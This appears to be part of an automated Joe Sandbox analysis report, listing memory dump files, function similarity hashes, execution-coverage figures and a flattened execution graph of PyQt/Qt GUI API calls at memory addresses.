                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_ErrorFilenameFromLastWindowsWith__stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: (originated from %s)
                                                                                                                                                                                                                • API String ID: 4225285543-1804376747
                                                                                                                                                                                                                • Opcode ID: 8a3d4494e18e7604f768112e4843f1ebb5e692acb9033b9abd8da8cb1651601d
                                                                                                                                                                                                                • Instruction ID: b30e271e41b9c361aba826bcc594dba42dfc9ae86aa7ac7d23f14977987d6956
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a3d4494e18e7604f768112e4843f1ebb5e692acb9033b9abd8da8cb1651601d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF03AA1718A8582EA309B36F4513AA63A0FF8C788FC52531DBCC4B25AEE3CD1458B44

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:0.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                Total number of Nodes:1713
                                                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                                                execution_graph 3694 7ffb9a30bee0 ??4QTextCursor@@QEAAAEAV0@AEBV0@ 3695 7ffb9a333ae0 3696 7ffb9a333b04 PyType_IsSubtype 3695->3696 3698 7ffb9a333b2d 3695->3698 3697 7ffb9a333b11 3696->3697 3696->3698 3699 7ffb9a333c51 3698->3699 3700 7ffb9a333b84 ??_0QVector3D@@QEAAAEAV0@M 3698->3700 3701 7ffb9a333ba9 3698->3701 3702 7ffb9a333bfe 3701->3702 3703 7ffb9a333bda ??_0QVector3D@@QEAAAEAV0@AEBV0@ 3701->3703 3704 7ffb9a333c21 3702->3704 3705 7ffb9a333c16 _Py_Dealloc 3702->3705 3704->3699 3706 7ffb9a333c2a PyErr_Clear 3704->3706 3705->3704 3707 7ffb9a337ee0 3708 7ffb9a337f22 3707->3708 3709 7ffb9a337f3f 3708->3709 3710 7ffb9a337f26 ?hasClipping@QPainter@ PyBool_FromLong 3708->3710 3711 7ffb9a2d1ad0 3712 7ffb9a2d1af4 PyType_IsSubtype 3711->3712 3714 7ffb9a2d1b1d 3711->3714 3713 7ffb9a2d1b01 3712->3713 3712->3714 3715 7ffb9a2d1b74 3714->3715 3716 7ffb9a2d1bb3 3714->3716 3717 7ffb9a2d1ba8 _Py_Dealloc 3714->3717 3716->3715 3718 7ffb9a2d1bbc PyErr_Clear 3716->3718 3717->3716 3719 7ffb9a2dbace ??5@YAAEAVQDataStream@@AEAV0@AEAVQPixmap@@ 3720 7ffb9a367af0 3721 7ffb9a367b2c 3720->3721 3722 7ffb9a367b4e 3721->3722 3723 7ffb9a367b34 ?createObject@QTextDocument@@MEAAPEAVQTextObject@@AEBVQTextFormat@@ 3721->3723 3724 7ffb9a367b75 ??0QFont@@QEAA@AEBV0@ 3722->3724 3725 7ffb9a367baf 3724->3725 3726 7ffb9a351ef0 3728 7ffb9a351f4d 3726->3728 3727 7ffb9a351fb7 3728->3727 3729 7ffb9a351f60 ??0QRasterWindow@@QEAA@PEAVQWindow@@ 3728->3729 3742 7ffb9a31faf0 3743 7ffb9a31fb10 3742->3743 3744 7ffb9a31faf5 ??1QRegion@@QEAA 3742->3744 3744->3743 3749 7ffb9a30bef0 3750 7ffb9a30bf32 3749->3750 3751 7ffb9a30bf6d 3750->3751 3752 7ffb9a30bf40 ?cursor@QWindow@@QEBA?AVQCursor@ 3750->3752 3753 7ffb9a30bf68 3752->3753 3754 7ffb9a2d7ac0 3755 7ffb9a2d7ae6 3754->3755 3756 7ffb9a2d7b1f 3755->3756 3758 7ffb9a2d7c6a 3755->3758 3760 7ffb9a2d7b73 3755->3760 3757 7ffb9a2d7b3e ??A?$QVector@VQPointF@@@@QEAAAEAVQPointF@@H 3756->3757 3756->3758 3759 7ffb9a2d7b63 3757->3759 3760->3758 3761 7ffb9a2d7bf1 ??0QPolygonF@@QEAA 3760->3761 3762 7ffb9a2d7c04 3761->3762 3763 7ffb9a2d7c40 3761->3763 3764 7ffb9a2d7c10 ??A?$QVector@VQPointF@@@@QEAAAEAVQPointF@@H ?append@?$QVector@VQPointF@@@@QEAAXAEBVQPointF@@ 3762->3764 3764->3763 3764->3764 3765 7ffb9a303ec0 3766 7ffb9a303f02 3765->3766 3767 7ffb9a303f10 ?discardCommand@QSessionManager@@QEBA?AVQStringList@ 3766->3767 3768 7ffb9a303f3d 3766->3768 3769 7ffb9a303f38 3767->3769 3774 7ffb9a2f5ec0 3775 7ffb9a2f5f02 3774->3775 3776 7ffb9a2f5f3d 3775->3776 3777 7ffb9a2f5f10 ?boundingRect@QTextLayout@@QEBA?AVQRectF@ 3775->3777 3778 7ffb9a2f5f38 3777->3778 3682 7ffb9a352b00 3683 7ffb9a352b57 3682->3683 3684 7ffb9a352b5b 3683->3684 3685 7ffb9a352b9d 3683->3685 3688 7ffb9a352b65 ??GQPainterPath@@QEBA?AV0@AEBV0@ 3684->3688 3686 7ffb9a352bc0 3685->3686 3687 7ffb9a352bb5 _Py_Dealloc 3685->3687 3687->3686 3689 7ffb9a352b92 3688->3689 3779 7ffb9a355f00 3780 7ffb9a355f5f 3779->3780 3781 7ffb9a355fb0 3780->3781 3782 7ffb9a355f63 ?setText@QStandardItem@@QEAAXAEBVQString@@ 3780->3782 3783 7ffb9a355f9a 3782->3783 3784 7ffb9a36df00 3785 7ffb9a36df36 3784->3785 3786 7ffb9a36df4f 3785->3786 3787 7ffb9a36df3b ?paintEngine@QPdfWriter@@MEBAPEAVQPaintEngine@ 3785->3787 3792 7ffb9a30ff00 3793 7ffb9a30ff4a 3792->3793 3794 7ffb9a30ff4e ?setWidthF@QPen@@QEAAXN 3793->3794 3795 7ffb9a30ff75 3793->3795 3796 7ffb9a347f00 3797 7ffb9a347f4a 3796->3797 3798 7ffb9a347f58 ??0QTransform@@QEAA 3797->3798 3800 7ffb9a347f9d 3797->3800 3799 7ffb9a347f74 ?toSubpathPolygons@QPainterPath@@QEBA?AV?$QList@VQPolygonF@@@@AEBVQTransform@@ 3798->3799 3801 7ffb9a347f94 3799->3801 3800->3799 3802 7ffb9a348016 3800->3802 3803 7ffb9a2fbab0 3804 7ffb9a2fbaf2 3803->3804 3805 7ffb9a2fbaf6 ?textPosition@QTextInlineObject@ PyLong_FromLong 3804->3805 3806 7ffb9a2fbb0e 3804->3806 3807 7ffb9a2ffeb0 3808 7ffb9a2ffef2 3807->3808 3809 7ffb9a2ffef6 ?devicePixelRatio@QWindow@ PyFloat_FromDouble 3808->3809 3810 7ffb9a2fff0c 3808->3810 3811 7ffb9a305eb0 3812 7ffb9a305eb9 3811->3812 3813 7ffb9a305ef3 3811->3813 3812->3813 3814 7ffb9a305ee0 ??1QPictureIO@@QEAA 3812->3814 3814->3813 3814->3814 3815 7ffb9a2e9eb0 3816 7ffb9a2e9f0d 3815->3816 3817 7ffb9a2e9f56 3816->3817 3818 7ffb9a2e9f20 ??0QValidator@@QEAA@PEAVQObject@@ 3816->3818 3831 7ffb9a323b10 3832 7ffb9a323b2a 3831->3832 3833 7ffb9a323b32 3832->3833 3834 7ffb9a323b38 PyFloat_FromDouble PyFloat_FromDouble PyFloat_FromDouble PyFloat_FromDouble 3832->3834 3835 7ffb9a323bd4 3834->3835 3836 7ffb9a323b97 3834->3836 3837 7ffb9a323bed 3835->3837 3839 7ffb9a323be4 _Py_Dealloc 3835->3839 3838 7ffb9a323bc4 3836->3838 3844 7ffb9a323ba6 PyUnicode_FromFormat 3836->3844 3840 7ffb9a323c06 3837->3840 3842 7ffb9a323bfd _Py_Dealloc 3837->3842 3838->3835 3841 7ffb9a323bcb _Py_Dealloc 3838->3841 3839->3837 3843 7ffb9a323c1f 3840->3843 3845 7ffb9a323c16 _Py_Dealloc 3840->3845 3841->3835 3842->3840 3844->3838 3845->3843 3846 7ffb9a311b10 3847 7ffb9a311b30 3846->3847 3848 7ffb9a311bab ?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@ 3847->3848 3849 7ffb9a311bb3 3847->3849 3848->3849 3850 7ffb9a315f10 3851 7ffb9a315f75 PySequence_Size 3850->3851 3852 7ffb9a315f36 PySequence_Check 3850->3852 3853 7ffb9a315f8d 3851->3853 3856 7ffb9a315f9f 3851->3856 3854 7ffb9a315f40 PyType_GetFlags 3852->3854 3855 7ffb9a315f50 3852->3855 3854->3855 3857 7ffb9a315ff0 PySequence_GetItem 3856->3857 3858 7ffb9a316020 PyErr_Occurred 3856->3858 3860 7ffb9a3161ac 3856->3860 3861 7ffb9a31616d ?append@QListData@ 3856->3861 3862 7ffb9a316043 ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH 3856->3862 3865 7ffb9a31618f _Py_Dealloc 3856->3865 3857->3856 3857->3860 3858->3856 3859 7ffb9a3161f8 PyErr_Format 3858->3859 3859->3860 3864 7ffb9a31622d _Py_Dealloc 3859->3864 3861->3856 3862->3856 3864->3860 3865->3856 3866 7ffb9a339f10 3867 7ffb9a339f5a 3866->3867 3868 7ffb9a339f5e ?setCurveThreshold@QPainterPathStroker@@QEAAXN 3867->3868 3869 7ffb9a339f85 3867->3869 3870 7ffb9a32fb10 3871 7ffb9a32fb52 3870->3871 3872 7ffb9a32fb6e 3871->3872 3873 7ffb9a32fb56 ?position@QTextFragment@ PyLong_FromLong 3871->3873 3874 7ffb9a2d9aa0 3875 7ffb9a2d9aa9 3874->3875 3876 7ffb9a2d9ae3 3874->3876 3875->3876 3877 7ffb9a2d9ad0 ??1QPolygonF@@QEAA 3875->3877 3877->3876 3877->3877 3878 7ffb9a35baa0 3879 7ffb9a35bac9 3878->3879 3880 7ffb9a35bad1 3879->3880 3881 7ffb9a35bb1b ??MQStandardItem@@UEBA_NAEBV0@ PyBool_FromLong 3879->3881 3882 7ffb9a35bb45 3879->3882 3883 7ffb9a35bb5b 3882->3883 3884 7ffb9a35bb55 _Py_Dealloc 3882->3884 3884->3883 3889 7ffb9a355aa0 3890 7ffb9a355b15 3889->3890 3891 7ffb9a355b4b 3890->3891 3892 7ffb9a355b19 ?setTransform@QPainter@@QEAAXAEBVQTransform@@_N 3890->3892 3893 7ffb9a325aa0 3894 7ffb9a325aea 3893->3894 3895 7ffb9a325aee ?setAlphaBufferSize@QSurfaceFormat@@QEAAXH 3894->3895 3896 7ffb9a325b13 3894->3896 3901 7ffb9a30daa0 3902 7ffb9a30dae1 3901->3902 3903 7ffb9a30daef ??0QTextTableFormat@@QEAA 3902->3903 3905 7ffb9a30db08 3902->3905 3903->3905 3904 7ffb9a30db7f 3905->3904 3906 7ffb9a30db5b ??0QFont@@QEAA@AEBV0@ 3905->3906 3907 7ffb9a30dea0 3908 7ffb9a30dee2 3907->3908 3909 7ffb9a30df23 3908->3909 3910 7ffb9a30dee6 PyEval_SaveThread ?showNormal@QWindow@ PyEval_RestoreThread 3908->3910 3911 7ffb9a315ea0 3912 7ffb9a315ed5 3911->3912 3913 7ffb9a315ee4 ??0QPainterPath@@QEAA 3912->3913 3914 7ffb9a315ef7 3912->3914 3913->3913 3913->3914 3915 7ffb9a341aa0 3916 7ffb9a341ac2 3915->3916 3917 7ffb9a341aca 3916->3917 3918 7ffb9a341b40 3916->3918 3919 7ffb9a341b0f ?position@QTextBlock@ ?position@QTextBlock@ PyBool_FromLong 3916->3919 3920 7ffb9a341b56 3918->3920 3921 7ffb9a341b50 _Py_Dealloc 3918->3921 3921->3920 3922 7ffb9a333ea0 3923 7ffb9a333ec9 3922->3923 3924 7ffb9a333ed1 3923->3924 3925 7ffb9a333f1b ??8QPalette@@QEBA_NAEBV0@ PyBool_FromLong 3923->3925 3926 7ffb9a333f45 3923->3926 3927 7ffb9a333f55 _Py_Dealloc 3926->3927 3928 7ffb9a333f5b 3926->3928 3927->3928 3929 7ffb9a2d9b10 3930 7ffb9a2d9b30 3929->3930 3931 7ffb9a2d9bb3 3930->3931 3932 7ffb9a2d9bab ?resetInternalData@QAbstractItemModel@ 3930->3932 3932->3931 3933 7ffb9a2ddb10 3934 7ffb9a2ddb26 3933->3934 3935 7ffb9a2ddbb5 3933->3935 3940 7ffb9a3639b0 3934->3940 3938 7ffb9a2ddba2 ?dispose@QListData@@SAXPEAUData@1@ 3938->3935 3939 7ffb9a2ddb90 ??1TouchPoint@QTouchEvent@@QEAA 3939->3938 3939->3939 3941 7ffb9a2ddb33 3940->3941 3942 7ffb9a3639e6 ?detach@QListData@@QEAAPEAUData@1@H 3940->3942 3941->3935 3941->3938 3941->3939 3942->3941 3943 7ffb9a363a2e 3942->3943 3944 7ffb9a363a30 ??0QBrush@@QEAA@AEBV0@ 3943->3944 3944->3941 3944->3944 3945 7ffb9a2e3b10 3946 7ffb9a2e3b83 3945->3946 3947 7ffb9a2e3bb0 3946->3947 3948 7ffb9a2e3b91 PyLong_AsVoidPtr PyErr_Occurred 3946->3948 3948->3947 3949 7ffb9a2e3ba5 PyErr_Clear 3948->3949 3949->3947 3950 7ffb9a2e1f10 3951 7ffb9a2e1f75 3950->3951 3952 7ffb9a2e1f79 ?beginInsertColumns@QAbstractItemModel@@IEAAXAEBVQModelIndex@@HH 3951->3952 3953 7ffb9a2e1faf 3951->3953 3954 7ffb9a2d3b10 3955 7ffb9a2d3b65 3954->3955 3956 7ffb9a2d3ba5 3955->3956 3957 7ffb9a2d3b73 ?itemText@QTextList@@QEBA?AVQString@@AEBVQTextBlock@@ 3955->3957 3958 7ffb9a2d3ba0 3957->3958 3959 7ffb9a303b10 3960 7ffb9a303bba 3959->3960 3961 7ffb9a303b26 3959->3961 3965 7ffb9a3638e0 3961->3965 3963 7ffb9a303ba7 ?dispose@QListData@@SAXPEAUData@1@ 3963->3960 3964 7ffb9a303b33 3964->3960 3964->3963 3966 7ffb9a363916 ?detach@QListData@@QEAAPEAUData@1@H 3965->3966 3967 7ffb9a3638fc 3965->3967 3966->3967 3967->3964 3972 7ffb9a34beb0 3973 7ffb9a34bef1 3972->3973 3974 7ffb9a34bf13 3973->3974 3975 7ffb9a34bef5 ?elementCount@QPainterPath@ PyBool_FromLong 3973->3975 3976 7ffb9a36fab0 3977 7ffb9a36fac2 3976->3977 3978 7ffb9a36fb54 3976->3978 3977->3978 3979 7ffb9a36facf PyList_Size 3977->3979 3980 7ffb9a3f9d5c 3979->3980 3981 7ffb9a36fafe PyList_Size 3980->3981 3982 7ffb9a36fb11 PyList_GetItem PyLong_AsLong PyList_Size 3981->3982 3983 7ffb9a36fb3a 3981->3983 3982->3982 3982->3983 3984 7ffb9a31dab0 3985 7ffb9a31dab9 3984->3985 3986 7ffb9a31daf3 3984->3986 3985->3986 3987 7ffb9a31dae0 ??1QTextCharFormat@@QEAA 3985->3987 3987->3986 3987->3987 3988 7ffb9a319eb0 3989 7ffb9a319ef2 3988->3989 3990 7ffb9a319f0f 3989->3990 3991 7ffb9a319ef6 ?isNull@QVector4D@ PyBool_FromLong 3989->3991 3992 7ffb9a31deb0 3993 7ffb9a31df07 3992->3993 3994 7ffb9a31df4d 3993->3994 3995 7ffb9a31df0b 3993->3995 3996 7ffb9a31df70 3994->3996 3998 7ffb9a31df65 _Py_Dealloc 3994->3998 3997 7ffb9a31df15 ??GQRegion@@QEBA?BV0@AEBV0@ 3995->3997 3999 7ffb9a31df42 3997->3999 3998->3996 4000 7ffb9a317ab0 4001 7ffb9a317af2 4000->4001 4002 7ffb9a317b13 4001->4002 4003 7ffb9a317af6 ?intProperty@QTextFormat@@QEBAHH PyLong_FromLong 4001->4003 4004 7ffb9a309eb0 4005 7ffb9a309efa 4004->4005 4006 7ffb9a309f1c 4005->4006 4007 7ffb9a309efe ?setKeyboardGrabEnabled@QWindow@@QEAA_N_N PyBool_FromLong 4005->4007 4008 7ffb9a33beb0 4009 7ffb9a33bf0e 4008->4009 4010 7ffb9a33bf12 ?drawPoints@QPainter@@QEAAXAEBVQPolygonF@@ 4009->4010 4011 7ffb9a33bf39 4009->4011 4022 7ffb9a33bf20 4010->4022 4012 7ffb9a33bf96 4011->4012 4013 7ffb9a33bf86 ?drawPoints@QPainter@@QEAAXAEBVQPolygon@@ 4011->4013 4014 7ffb9a33bff8 ?drawPoints@QPainter@@QEAAXPEBVQPointF@@H 4012->4014 4015 7ffb9a33c021 4012->4015 4013->4022 4014->4022 4016 7ffb9a33c102 4015->4016 4017 7ffb9a33c083 4015->4017 4018 7ffb9a33c164 ?drawPoints@QPainter@@QEAAXPEBVQPoint@@H 4016->4018 4023 7ffb9a33c18d 4016->4023 4019 7ffb9a33c09f PyTuple_Size ?drawPoints@QPainter@@QEAAXPEBVQPointF@@H 4017->4019 4020 7ffb9a33c0c2 4017->4020 4018->4022 4019->4020 4021 7ffb9a33c0d3 _Py_Dealloc 4020->4021 4020->4022 4021->4022 4023->4022 4024 7ffb9a33c1ff PyTuple_Size ?drawPoints@QPainter@@QEAAXPEBVQPoint@@H 4023->4024 4025 7ffb9a33c222 4023->4025 4024->4025 4025->4022 4026 7ffb9a33c233 _Py_Dealloc 4025->4026 4026->4022 4027 7ffb9a32dab0 4028 7ffb9a32daf2 4027->4028 4029 7ffb9a32db0c 4028->4029 4030 7ffb9a32daf6 ?leading@QRawFont@ PyFloat_FromDouble 4028->4030 4031 7ffb9a337ab0 4032 7ffb9a337add 4031->4032 4033 7ffb9a337b03 4032->4033 4034 7ffb9a337af0 ??0iterator@QTextBlock@@QEAA 4032->4034 4034->4033 4034->4034 4035 7ffb9a329eb0 4036 7ffb9a329ef2 4035->4036 4037 7ffb9a329f0e 4036->4037 4038 7ffb9a329ef6 ?weight@QRawFont@ PyLong_FromLong 4036->4038 4039 7ffb9a32feb0 4040 7ffb9a32fef2 4039->4040 4041 7ffb9a32ff0e 4040->4041 4042 7ffb9a32fef6 ?length@QTextFragment@ PyLong_FromLong 4040->4042 4043 7ffb9a2d5b00 4044 7ffb9a2d5b4e 4043->4044 4045 7ffb9a2d5b78 4044->4045 4046 7ffb9a2d5b52 ?remove@?$QVector@VQPointF@@@@QEAAXH 4044->4046 4048 7ffb9a2d5bc7 ?remove@?$QVector@VQPointF@@@@QEAAXHH 4045->4048 4049 7ffb9a2d5bdd 4045->4049 4047 7ffb9a2d5b61 4046->4047 4048->4047 4050 7ffb9a2fdb00 4052 7ffb9a2fdb1e 4050->4052 4051 7ffb9a2fdbf6 4052->4051 4053 7ffb9a2fdb8e ?format@QWindow@@UEBA?AVQSurfaceFormat@ ??0QBrush@@QEAA@AEBV0@ 4052->4053 4054 7ffb9a2fdbac ??0QBrush@@QEAA@AEBV0@ 4052->4054 4055 7ffb9a2fdbc8 ??1QSurfaceFormat@@QEAA 4053->4055 4054->4055 4057 7ffb9a2fdbeb 4055->4057 4066 7ffb9a339ac0 4067 7ffb9a339b02 4066->4067 4068 7ffb9a339b3d 4067->4068 4069 7ffb9a339b10 ?toVector4D@QVector2D@@QEBA?AVQVector4D@ 4067->4069 4070 7ffb9a339b38 4069->4070 4071 7ffb9a341ec0 4072 7ffb9a341f37 4071->4072 4073 7ffb9a341f3b ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@ 4072->4073 4074 7ffb9a341f87 4072->4074 4077 7ffb9a341f53 4073->4077 4075 7ffb9a341fed ?setProperty@QTextFormat@@QEAAXHAEBV?$QVector@VQTextLength@@@@ 4074->4075 4076 7ffb9a34200a 4074->4076 4075->4077 4078 7ffb9a2dfef6 ??6@YAAEAVQDataStream@@AEAV0@AEBVQPicture@@ 4083 7ffb9a32bec0 4084 7ffb9a32bed6 4083->4084 4085 7ffb9a32bf0d 4084->4085 4086 7ffb9a32bef2 ??1QTextOption@@QEAA 4084->4086 4086->4085 4092 7ffb9a2d9ef0 4093 7ffb9a2d9f59 4092->4093 4094 7ffb9a2da250 4093->4094 4096 7ffb9a2d9f61 4093->4096 4097 7ffb9a2da27a 4093->4097 4095 7ffb9a2da25a ?map@QTransform@@QEBA?AVQPoint@@AEBV2@ 4094->4095 4095->4096 4098 7ffb9a2da2e0 ?map@QTransform@@QEBA?AVQPointF@@AEBV2@ 4097->4098 4099 7ffb9a2da311 4097->4099 4098->4099 4100 7ffb9a2da36c ?map@QTransform@@QEBA?AVQLineF@@AEBV2@ 4099->4100 4103 7ffb9a2da38c 4099->4103 4100->4103 4101 7ffb9a2da402 4102 7ffb9a2da422 4101->4102 4105 7ffb9a2da418 _Py_Dealloc 4101->4105 4102->4096 4106 7ffb9a2da42f PyErr_Clear 4102->4106 4103->4101 4104 7ffb9a2da3e2 ?map@QTransform@@QEBA?AVQLine@@AEBV2@ 4103->4104 4104->4101 4105->4102 4106->4096 4107 7ffb9a2edaf0 4108 7ffb9a2edb10 4107->4108 4109 7ffb9a2edaf5 ??1QPolygon@@QEAA 4107->4109 4109->4108 4110 7ffb9a35fad0 4111 7ffb9a35fb1e 4110->4111 4112 7ffb9a35fb5f 4111->4112 4113 7ffb9a35fb22 4111->4113 4115 7ffb9a35fbd6 4112->4115 4117 7ffb9a35fba4 ?sizePixels@QPageSize@@SA?AVQSize@@W4PageSizeId@1@H 4112->4117 4114 7ffb9a35fb2c ?sizePixels@QPageSize@@QEBA?AVQSize@@H 4113->4114 4116 7ffb9a35fb59 4114->4116 4118 7ffb9a35fbd0 4117->4118 4119 7ffb9a35fed0 4120 7ffb9a3f9d18 4119->4120 4121 7ffb9a35feea ??0QPainterPath@@QEAA@AEBV0@ 4120->4121 4122 7ffb9a351ad0 4123 7ffb9a351b3b 4122->4123 4124 7ffb9a351b3f ?insertRow@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@ 4123->4124 4125 7ffb9a351b8e 4123->4125 4126 7ffb9a351b77 4124->4126 4127 7ffb9a351beb ?insertRow@QStandardItem@@QEAAXHPEAV1@ 4125->4127 4128 7ffb9a351c0a 4125->4128 4127->4126 4129 7ffb9a353ad0 4130 7ffb9a353b1a 4129->4130 4131 7ffb9a353b1e ?removeColumn@QStandardItem@@QEAAXH 4130->4131 4132 7ffb9a353b43 4130->4132 4133 7ffb9a353ed0 4134 7ffb9a353f22 4133->4134 4135 7ffb9a353f50 4134->4135 4136 7ffb9a353f26 ?removeRows@QStandardItem@@QEAAXHH 4134->4136 4137 7ffb9a319ad0 4138 7ffb9a319b05 4137->4138 4139 7ffb9a319b4c 4138->4139 4140 7ffb9a319b30 ??0QWindow@@QEAA@PEAVQScreen@@ 4138->4140 4140->4139 4140->4140 4141 7ffb9a315ad0 4142 7ffb9a315b05 4141->4142 4143 7ffb9a315b14 ??0QPen@@QEAA 4142->4143 4144 7ffb9a315b27 4142->4144 4143->4143 4143->4144 4145 7ffb9a317ed0 4146 7ffb9a317f12 4145->4146 4147 7ffb9a317f4d 4146->4147 4148 7ffb9a317f20 ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@ 4146->4148 4149 7ffb9a317f48 4148->4149 4150 7ffb9a2dfae6 ??6@YAAEAVQDataStream@@AEAV0@AEBVQColorSpace@@ 4151 7ffb9a33bad0 4152 7ffb9a33bb05 4151->4152 4153 7ffb9a33bb14 ??0QPainterPathStroker@@QEAA 4152->4153 4154 7ffb9a33bb27 4152->4154 4153->4153 4153->4154 4155 7ffb9a33dad0 4156 7ffb9a33daf9 4155->4156 4157 7ffb9a33db01 4156->4157 4158 7ffb9a33db4b 4156->4158 4159 7ffb9a33db74 4156->4159 4160 7ffb9a33db58 PyBool_FromLong 4158->4160 4161 7ffb9a33db84 _Py_Dealloc 4159->4161 4162 7ffb9a33db8a 4159->4162 4161->4162 4163 7ffb9a2f5ae0 4164 7ffb9a2f5b22 4163->4164 4165 7ffb9a2f5b26 ?lineCount@QTextDocument@ PyLong_FromLong 4164->4165 4166 7ffb9a2f5b3e 4164->4166 4167 7ffb9a34fb60 4168 7ffb9a34fbc4 4167->4168 4169 7ffb9a34fbc8 4168->4169 4171 7ffb9a34fc45 ??0QRectF@@QEAA@AEBVQRect@@ 4168->4171 4172 7ffb9a34fc62 4168->4172 4170 7ffb9a34fbd0 ?eraseRect@QPainter@@QEAAXAEBVQRectF@@ 4169->4170 4171->4170 4173 7ffb9a36fb60 ?parent@QObject@@QEBAPEAV1 4174 7ffb9a36fba6 ?parent@QObject@@QEBAPEAV1 4173->4174 4178 7ffb9a36fb90 4173->4178 4181 7ffb9a36fc60 4174->4181 4176 7ffb9a36fbb7 4177 7ffb9a36fc32 4176->4177 4176->4178 4180 7ffb9a36fbee _Py_Dealloc 4176->4180 4178->4177 4179 7ffb9a36fc29 _Py_Dealloc 4178->4179 4179->4177 4180->4178 4182 7ffb9a36fc6e 4181->4182 4183 7ffb9a36fc85 ?parent@QObject@@QEBAPEAV1 4181->4183 4182->4176 4184 7ffb9a36fc98 4183->4184 4185 7ffb9a36fca0 4184->4185 4186 7ffb9a36fcd9 _Py_Dealloc 4184->4186 4185->4176 4186->4185 4187 7ffb9a369b60 4188 7ffb9a369ba7 4187->4188 4189 7ffb9a369baf ?drawRects@QPaintEngine@@UEAAXPEBVQRect@@H 4188->4189 4190 7ffb9a369bc0 4188->4190 4189->4190 4191 7ffb9a30bb60 4192 7ffb9a30bbb5 4191->4192 4193 7ffb9a30bbf5 4192->4193 4194 7ffb9a30bbc3 ?mapFromGlobal@QWindow@@QEBA?AVQPoint@@AEBV2@ 4192->4194 4195 7ffb9a30bbf0 4194->4195 4200 7ffb9a2dfb4e ??6@YAAEAVQDataStream@@AEAV0@AEBVQCursor@@ 4201 7ffb9a319b70 4202 7ffb9a319be3 4201->4202 4203 7ffb9a319be7 ?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQTextCharFormat@@ 4202->4203 4204 7ffb9a319c1e 4202->4204 4207 7ffb9a319bfc 4203->4207 4205 7ffb9a319c8d ?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQColor@@ 4204->4205 4206 7ffb9a319cc3 4204->4206 4205->4207 4208 7ffb9a319d3c 4206->4208 4209 7ffb9a319d22 ?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQFont@@ 4206->4209 4209->4208 4210 7ffb9a339b70 4211 7ffb9a339bb2 4210->4211 4212 7ffb9a339bcc 4211->4212 4213 7ffb9a339bb6 ?miterLimit@QPainterPathStroker@ PyFloat_FromDouble 4211->4213 4214 7ffb9a2fbb40 4215 7ffb9a2fbb82 4214->4215 4216 7ffb9a2fbb86 ?position@QTextCursor@ PyLong_FromLong 4215->4216 4217 7ffb9a2fbb9e 4215->4217 4222 7ffb9a2efb40 4223 7ffb9a2efb82 4222->4223 4224 7ffb9a2efbbd 4223->4224 4225 7ffb9a2efb90 ?text@QTextLayout@@QEBA?AVQString@ 4223->4225 4226 7ffb9a2efbb8 4225->4226 4227 7ffb9a2f3b40 4228 7ffb9a2f3bb5 4227->4228 4229 7ffb9a2f3bb9 ?nextCursorPosition@QTextLayout@@QEBAHHW4CursorMode@1@ PyLong_FromLong 4228->4229 4230 7ffb9a2f3be0 4228->4230 4231 7ffb9a353b80 4232 7ffb9a353bc2 4231->4232 4233 7ffb9a353bfd 4232->4233 4234 7ffb9a353bd0 ?end@QTextFrame@@QEBA?AViterator@1 4232->4234 4235 7ffb9a353bf8 4234->4235 4236 7ffb9a355b80 4237 7ffb9a355ba0 4236->4237 4238 7ffb9a355c1b ?write@QStandardItem@@UEBAXAEAVQDataStream@@ 4237->4238 4239 7ffb9a355c23 4237->4239 4238->4239 4244 7ffb9a2dbb36 ??5@YAAEAVQDataStream@@AEAV0@AEAVQPolygonF@@ 4245 7ffb9a2e9b30 4246 7ffb9a2e9b56 4245->4246 4247 7ffb9a2e9b8f 4246->4247 4249 7ffb9a2e9bce 4246->4249 4250 7ffb9a2e9c77 4246->4250 4248 7ffb9a2e9bb1 ?remove@?$QVector@VQPoint@@@@QEAAXH 4247->4248 4247->4250 4249->4250 4251 7ffb9a2e9c50 ?remove@?$QVector@VQPoint@@@@QEAAXH 4249->4251 4251->4250 4251->4251 4252 7ffb9a2ebb30 ??4QTextFormat@@QEAAAEAV0@AEBV0@ 4253 7ffb9a35db90 4254 7ffb9a35dbd8 4253->4254 4255 7ffb9a35dbdc 4254->4255 4256 7ffb9a35dbf4 4254->4256 4257 7ffb9a35dbe6 ??0QTextDocumentWriter@@QEAA 4255->4257 4259 7ffb9a35dca0 ??0?$QVector@VQPoint@@@@QEAA 4256->4259 4260 7ffb9a35dc5d 4256->4260 4258 7ffb9a35dc98 4257->4258 4262 7ffb9a35dd2b 4259->4262 4261 7ffb9a35dc67 ??0QTextDocumentWriter@@QEAA@PEAVQIODevice@@AEBVQByteArray@@ 4260->4261 4261->4258 4263 7ffb9a35dd2f 4262->4263 4264 7ffb9a35dd96 ??1QByteArray@@QEAA 4262->4264 4265 7ffb9a35dd39 ??0QTextDocumentWriter@@QEAA@AEBVQString@@AEBVQByteArray@@ 